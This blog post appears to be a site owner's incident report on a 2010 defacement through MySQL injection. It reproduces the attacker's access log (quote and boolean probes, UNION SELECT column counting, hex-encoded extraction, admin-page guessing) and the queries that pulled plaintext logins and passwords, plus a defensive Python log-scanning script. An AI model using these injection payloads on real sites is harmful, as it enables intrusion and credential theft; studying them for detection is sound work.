H4cked By S3nleVeyaSensiz Turkish Attacker One Turk Against The World
By PlaceOweb on Friday, July 30 2010, 19:29 - SQL - Permalink
Your site hacked with the message "H4cked By S3nleVeyaSensiz Turkish Attacker One Turk Against The World"? Congratulations! You have a vulnerability and have been the victim of a MySQL injection.
In our case it all started with a web directory that was listable and had no index file (Options +Indexes).
Then came the SQL injection probing:
78.171.57.168 - - [27/Jul/2010:15:37:05 +0200] "GET /pages/dossier.php?id=23%27 HTTP/1.1" 200 138
78.171.57.168 - - [27/Jul/2010:15:37:11 +0200] "GET /pages/dossier.php?id=23 HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:13 +0200] "GET /pages/dossier.php?id=-9.9 HTTP/1.1" 200 11642
78.171.57.168 - - [27/Jul/2010:15:37:16 +0200] "GET /pages/dossier.php?id=23%20and%201=1 HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:19 +0200] "GET /pages/dossier.php?id=23%20and%201=0 HTTP/1.1" 200 11642
78.171.57.168 - - [27/Jul/2010:15:37:21 +0200] "GET /pages/dossier.php?id=23%20and%201=1 HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:24 +0200] "GET /pages/dossier.php?id=23' HTTP/1.1" 200 162
78.171.57.168 - - [27/Jul/2010:15:37:24 +0200] "GET /pages/dossier.php?id=/*!30000%2023*/ HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:27 +0200] "GET /pages/dossier.php?id=/*!40100%2023*/ HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:30 +0200] "GET /pages/dossier.php?id=/*!50000%2023*/ HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:32 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536-- HTTP/1.1" 200 76
78.171.57.168 - - [27/Jul/2010:15:37:33 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536-- HTTP/1.1" 200 76
78.171.57.168 - - [27/Jul/2010:15:37:33 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- HTTP/1.1" 200 76
78.171.57.168 - - [27/Jul/2010:15:37:33 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- HTTP/1.1" 200 76
78.171.57.168 - - [27/Jul/2010:15:37:33 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- HTTP/1.1" 200 11672
78.171.57.168 - - [27/Jul/2010:15:37:36 +0200] "GET /pages/dossier.php?id=23%20UNION%20ALL%20SELECT%20null,null,null,null,null%20from%20msdb..backupfile-- HTTP/1.1" 200 174
78.171.57.168 - - [27/Jul/2010:15:37:36 +0200] "GET /pages/dossier.php?id=23%20UNION%20ALL%20SELECT%20null,null,null,null,null%20from%20mysql.db-- HTTP/1.1" 200 81
78.171.57.168 - - [27/Jul/2010:15:37:36 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%20concat(0x7e,0x27,0x7233646D3076335F73716C5F696E6A656374696F6E,0x27,0x7e),2,3,4,5-- HTTP/1.1" 200 11645
78.171.57.168 - - [27/Jul/2010:15:37:39 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%201,concat(0x7e,0x27,0x7233646D3076335F73716C5F696E6A656374696F6E,0x27,0x7e),3,4,5-- HTTP/1.1" 200 11669
78.171.57.168 - - [27/Jul/2010:15:37:43 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%201,concat(0x7e,0x27,Hex(cast(database()%20as%20char)),0x27,0x7e),3,4,5-- HTTP/1.1" 200 11670
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /admin.php HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /admin.asp HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /login.html HTTP/1.1" 404 344
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /login.htm HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /login/ HTTP/1.1" 404 340
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /login.php HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /login.asp HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /admin/account.html HTTP/1.1" 404 352
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /admin/login.html HTTP/1.1" 404 350
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /admin/login.htm HTTP/1.1" 404 349
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /admin/home.php HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/home.asp HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/controlpanel.html HTTP/1.1" 404 357
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/cp.php HTTP/1.1" 404 346
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/cp.asp HTTP/1.1" 404 346
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/adminLogin.html HTTP/1.1" 404 355
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/adminLogin.htm HTTP/1.1" 404 354
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/admin_login.php HTTP/1.1" 404 355
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/admin_login.asp HTTP/1.1" 404 355
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/controlpanel.asp HTTP/1.1" 404 356
78.171.57.168 - - [27/Jul/2010:15:41:02 +0200] "GET /admin/admin-login.php HTTP/1.1" 404 355
78.171.57.168 - - [27/Jul/2010:15:41:02 +0200] "GET /admin/admin-login.asp HTTP/1.1" 404 355
78.171.57.168 - - [27/Jul/2010:15:41:02 +0200] "GET /admin-login.php HTTP/1.1" 404 349
78.171.57.168 - - [27/Jul/2010:15:41:02 +0200] "GET /admin-login.asp HTTP/1.1" 404 349
78.171.57.168 - - [27/Jul/2010:15:41:02 +0200] "GET /admin/account.php HTTP/1.1" 404 351
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /admin/account.asp HTTP/1.1" 404 351
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /admin/admin.php HTTP/1.1" 404 349
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /admin/admin.asp HTTP/1.1" 404 349
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /adm/ HTTP/1.1" 404 338
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /admin/ HTTP/1.1" 302 3602
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /admin.htm HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /admin.html HTTP/1.1" 404 344
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /adminitem/ HTTP/1.1" 404 344
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /adminitem.php HTTP/1.1" 404 347
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /admin/controlpanel.htm HTTP/1.1" 404 356
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminitem.asp HTTP/1.1" 404 347
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminitems/ HTTP/1.1" 404 345
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminitems.php HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminitems.asp HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administrator/ HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administrator/login.php HTTP/1.1" 404 357
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administrator/login.asp HTTP/1.1" 404 357
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administrator.php HTTP/1.1" 404 351
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administrator.asp HTTP/1.1" 404 351
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administration/ HTTP/1.1" 404 349
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administration.php HTTP/1.1" 404 352
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administration.asp HTTP/1.1" 404 352
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminLogin/ HTTP/1.1" 404 345
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminlogin.php HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminlogin.asp HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /admin/controlpanel.php HTTP/1.1" 404 356
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /admin_area/admin.php HTTP/1.1" 404 354
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /admin_area/admin.asp HTTP/1.1" 404 354
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /admin_area/ HTTP/1.1" 404 345
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /admin_area/login.php HTTP/1.1" 404 354
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /admin_area/login.asp HTTP/1.1" 404 354
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /manager/ HTTP/1.1" 404 342
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /manager.php HTTP/1.1" 404 345
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /manager.asp HTTP/1.1" 404 345
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /letmein/ HTTP/1.1" 404 342
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /letmein.php HTTP/1.1" 404 345
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /letmein.asp HTTP/1.1" 404 345
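As an added detection example (not code from the original post), this Python script parses Common Log Format lines, URL-decodes each request and flags the probe families visible in the log above (quote after a numeric parameter, "and 1=1" boolean tests, /*!NNNNN*/ version comments, UNION SELECT, concat/hex extraction), and separately reports any IP piling up 404s the way the admin-path guessing did; the sample entries are copied from the log above plus one constructed benign request from 203.0.113.7.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample: entries copied from the access log above, plus one benign request (203.0.113.7).
SAMPLE_LOG = """\
78.171.57.168 - - [27/Jul/2010:15:37:05 +0200] "GET /pages/dossier.php?id=23%27 HTTP/1.1" 200 138
78.171.57.168 - - [27/Jul/2010:15:37:16 +0200] "GET /pages/dossier.php?id=23%20and%201=1 HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:30 +0200] "GET /pages/dossier.php?id=/*!50000%2023*/ HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:32 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536-- HTTP/1.1" 200 76
78.171.57.168 - - [27/Jul/2010:15:37:43 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%201,concat(0x7e,0x27,Hex(cast(database()%20as%20char)),0x27,0x7e),3,4,5-- HTTP/1.1" 200 11670
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /admin.php HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /login.php HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administrator/ HTTP/1.1" 404 348
203.0.113.7 - - [27/Jul/2010:15:42:00 +0200] "GET /pages/dossier.php?id=23 HTTP/1.1" 200 29513
"""

# Common Log Format: ip ident user [timestamp] "method url protocol" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+')

# One regex per probe family seen in the log; each is applied to the URL-decoded request.
SQLI_PATTERNS = {
    "quote after numeric param": re.compile(r"[?&]\w+=-?\d+(\.\d+)?'"),
    "boolean probe":             re.compile(r"\band\s+1\s*=\s*[01]\b", re.I),
    "mysql version comment":     re.compile(r"/\*!\d{5}"),
    "union select":              re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "concat/hex extraction":     re.compile(r"\b(concat|hex)\s*\(|0x[0-9a-f]{6,}", re.I),
}

def classify_request(url):
    """Return the names of every injection pattern the decoded request URL matches."""
    decoded = unquote_plus(url)
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(decoded)]

def analyze(log_text, scan_threshold=3):
    """Flag injection probes per line and IPs accumulating 404s (admin-path guessing)."""
    hits, not_found = [], Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a Common Log Format line; skip it rather than crash
        tags = classify_request(m["url"])
        if tags:
            hits.append((m["ip"], m["url"], tags))
        if m["status"] == "404":
            not_found[m["ip"]] += 1
    scanners = {ip: n for ip, n in not_found.items() if n >= scan_threshold}
    return {"sqli": hits, "scanners": scanners}
```

Run it against a real access log by passing the file contents to analyze(); the 404 threshold is deliberately low for the sample and should be raised for production traffic.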
Then queries were run to discover the structure of the accessible tables, and finally the login/password (stored in clear text in the database :)
mysql> SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0x65656565;
+---+
| concat(0x7e,0x27,count(table_name),0x27,0x7e) |
+---+
| |
+---+
1 row in set (0.00 sec)

mysql> SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `mabase`.utilisateurs;
+--+
| concat(0x7e,0x27,count(*),0x27,0x7e) |
+--+
| |
+--+
1 row in set (0.00 sec)

mysql> SELECT concat(0x7e,0x27,Hex(cast(utilisateurs.user_login as char)),0x27,0x7e) FROM `mabase`.utilisateurs LIMIT 0,1;
++
| concat(0x7e,0x27,Hex(cast(utilisateurs.login as char)),0x27,0x7e) |
++
| |
++
1 row in set (0.02 sec)

mysql> SELECT concat(0x7e,0x27,Hex(cast(utilisateurs.user_pwd as char)),0x27,0x7e) FROM `mabase`.utilisateurs LIMIT 0,1;
+--+
| concat(0x7e,0x27,Hex(cast(utilisateurs.pwd as char)),0x27,0x7e) |
+--+
| |
+--+
1 row in set (0.00 sec)
Converting the hexadecimal back to a string
<?php
// PHP script converting hexadecimal to ASCII text.
// PHP 5.4+ ships a native hex2bin(); redeclaring it is a fatal error, so only define ours when it is missing.
if (!function_exists('hex2bin')) {
    function hex2bin($data) {
        // 7574696C6973617465757273, not 0x7574696C6973617465757273 == utilisateurs
        $str = '';
        $len = strlen($data);
        for ($i = 0; $i < $len; $i += 2) {
            $str .= pack("C", hexdec(substr($data, $i, 2)));
        }
        return $str;
    }
}

echo hex2bin('7574696C6973617465757273'); // utilisateurs